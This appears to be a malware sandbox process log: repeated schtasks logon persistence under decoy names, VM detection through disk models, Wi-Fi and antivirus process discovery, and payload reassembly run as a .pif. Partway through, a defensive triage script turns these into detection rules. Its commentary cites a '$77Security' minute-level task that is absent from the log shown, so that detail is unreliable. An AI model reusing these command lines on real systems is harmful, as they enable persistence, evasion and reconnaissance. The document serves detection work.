"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LkORHBv6MEkT.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Users\Admin\Desktop\Files\TCP.exe
"C:\Users\Admin\Desktop\Files\TCP.exe"
C:\Users\Admin\Desktop\Files\c3.exe
"C:\Users\Admin\Desktop\Files\c3.exe"
C:\Users\Admin\Desktop\Files\winlog32.exe
"C:\Users\Admin\Desktop\Files\winlog32.exe"
C:\Users\Admin\Desktop\Files\TPB-1.exe
"C:\Users\Admin\Desktop\Files\TPB-1.exe"
C:\Users\Admin\Desktop\Files\TPB-1.exe
"C:\Users\Admin\Desktop\Files\TPB-1.exe"
C:\Users\Admin\Desktop\Files\TPB-1.exe
"C:\Users\Admin\Desktop\Files\TPB-1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5332 -ip 5332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 860
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rYhDRPD5vi3w.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 552 -p 3144 -ip 3144
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3144 -s 344
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Loli169.bat
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 632 -p 5260 -ip 5260
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5260 -s 352
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hY3WriDIaW8q.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QqQGkUhifzGh.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OGro20IwsaQZ.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Users\Admin\Desktop\Files\MajesticExec.exe
"C:\Users\Admin\Desktop\Files\MajesticExec.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q52y8mMUPLgh.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\qNVQKFyM.exe
"C:\Users\Admin\Desktop\Files\qNVQKFyM.exe"
C:\Users\Admin\Desktop\Files\svc.exe
"C:\Users\Admin\Desktop\Files\svc.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\d4V2EwdrqlEs.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eDlbxk1R5dLM.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fnaDQMRBOCPz.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9YDL858ngq4B.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\Loli169.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9YDL858ngq4B.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TuGrPuBdKTPZ.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TuGrPuBdKTPZ.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IrF6CLU8JxbY.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\random.exe
"C:\Users\Admin\Desktop\Files\random.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\Desktop\Files\sam.exe
"C:\Users\Admin\Desktop\Files\sam.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CbU7OfKCtes6.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\PowerRat.exe
"C:\Users\Admin\Desktop\Files\PowerRat.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\DllHost.exe
"C:\Windows\system32\DllHost.exe" /Processid:{9F156763-7844-4DC4-B2B1-901F640F5155}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iGrTS9ZFWksk.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\nobody.exe
"C:\Users\Admin\Desktop\Files\nobody.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\Desktop\Files\bnkrigkawd.exe
"C:\Users\Admin\Desktop\Files\bnkrigkawd.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\Desktop\Files\99awhy8l.exe
"C:\Users\Admin\Desktop\Files\99awhy8l.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AEnGm3FHatpx.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 578678
C:\Windows\SysWOW64\findstr.exe
findstr /V "PEACEFOLKSEXUALISLANDS" Hill
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif
Cooper.pif y
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
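Taken as a flat list of image-path / command-line pairs, the run above shows the behaviours a detection engineer keys on: schtasks entries pointing into AppData with `/rl HIGHEST`, the `wmic diskdrive get Model` output piped through `findstr` for QEMU and other hypervisor disk models, `netsh wlan show profiles` for saved Wi-Fi profiles, `tasklist` piped through `findstr` for security-product processes, the `ping -n 10 localhost` pause in the relaunch batch files, and `copy /b` reassembly of a payload that is then started as a .pif from Temp. The Python below is an added example, not part of the report, that parses that two-line-per-process layout and scores each pair against those rules; SAMPLE is a constructed excerpt of the lines above.

```python
"""Triage a sandbox process list given as alternating 'image path' / 'command line'
lines.  Added example; SAMPLE is a constructed excerpt of the captured run."""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Hit:
    rule: str
    image: str
    cmdline: str


# Locations a standard user can write to; persistence pointing here is the red flag.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|desktop|downloads)\\")
VM_DISK_TOKENS = ("qemu", "vbox", "virtualbox", "vmware", "dady harddisk")
# Process names the captured batch scripts grep for (Webroot, Avast, AVG, Bitdefender and Sophos among them).
AV_TOKENS = ("wrsa", "opssvc", "avastui", "avgui", "bdservicehost", "nswscsvc", "sophoshealth")


def schtasks_to_user_path(image: str, c: str) -> bool:
    """schtasks /create whose /tr target is under the user profile and runs at logon,
    every minute, or with the highest run level."""
    if "schtasks" not in c or "/create" not in c:
        return False
    target = re.search(r'/tr\s+"?([^"]+)', c)
    return bool(target and USER_WRITABLE.search(target.group(1))
                and ("/rl highest" in c or "/sc onlogon" in c or "/sc minute" in c))


def disk_model_vm_check(image: str, c: str) -> bool:
    """wmic diskdrive get Model, or a findstr over hypervisor disk-model strings."""
    return ("diskdrive" in c and "model" in c) or ("findstr" in c and any(t in c for t in VM_DISK_TOKENS))


def wifi_discovery(image: str, c: str) -> bool:
    return "netsh" in c and "wlan" in c and ("show profiles" in c or "show networks" in c)


def av_process_discovery(image: str, c: str) -> bool:
    return ("tasklist" in c or "findstr" in c) and any(t in c for t in AV_TOKENS)


def ping_delay(image: str, c: str) -> bool:
    """'ping -n N localhost' is the batch-file sleep used before the RAT relaunches itself."""
    return c.startswith("ping") and " -n " in c and ("localhost" in c or "127.0.0.1" in c)


def fragment_reassembly(image: str, c: str) -> bool:
    """copy /b a + b + c target: a payload stitched together from innocuous-looking chunks."""
    return "copy /b" in c and "+" in c


def pif_from_temp(image: str, c: str) -> bool:
    return image.endswith(".pif") and "\\temp\\" in image


RULES = {
    "persistence.schtasks_user_path": schtasks_to_user_path,
    "evasion.disk_model_vm_check": disk_model_vm_check,
    "discovery.wifi_profiles": wifi_discovery,
    "discovery.av_processes": av_process_discovery,
    "execution.ping_delay": ping_delay,
    "execution.fragment_reassembly": fragment_reassembly,
    "execution.pif_from_temp": pif_from_temp,
}


def parse_pairs(text: str) -> list[tuple[str, str]]:
    """The report lists each process as its image path followed by its command line."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("odd number of lines: input is not image/cmdline pairs")
    return list(zip(lines[::2], lines[1::2]))


def triage(text: str) -> list[Hit]:
    """Every rule is a substring test on the lower-cased image path and command line."""
    hits = []
    for image, cmd in parse_pairs(text):
        img, c = image.lower(), cmd.lower()
        for name, rule in RULES.items():
            if rule(img, c):
                hits.append(Hit(name, image, cmd))
    return hits


def summary(hits: list[Hit]) -> dict[str, int]:
    return dict(Counter(h.rule for h in hits))


# Constructed excerpt of the captured process list (nine processes).
SAMPLE = r"""
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief y
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif
Cooper.pif y
"""

if __name__ == "__main__":
    for h in triage(SAMPLE):
        print(f"{h.rule:36} {h.cmdline}")
    print(summary(triage(SAMPLE)))
```

Each rule is deliberately a plain substring test on the lower-cased command line so it carries over unchanged into a SIEM search or a Sigma-style rule. The disk-model rule fires twice in the excerpt because the wmic enumeration and the findstr filter appear as separate processes, which is how a `|` pipeline shows up in a flat list; the `$77Security` task earlier in the run (`/sc minute /mo 1 ... /RL HIGHEST`) is caught by the same persistence rule as the `svhost` and `Discord` tasks.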
C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe
"C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe"
C:\Users\Admin\Desktop\Files\XM.exe
"C:\Users\Admin\Desktop\Files\XM.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\Desktop\Files\xxx.exe
"C:\Users\Admin\Desktop\Files\xxx.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\surfex.exe
"C:\Users\Admin\Desktop\Files\surfex.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZYRYbhs6JAqJ.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe
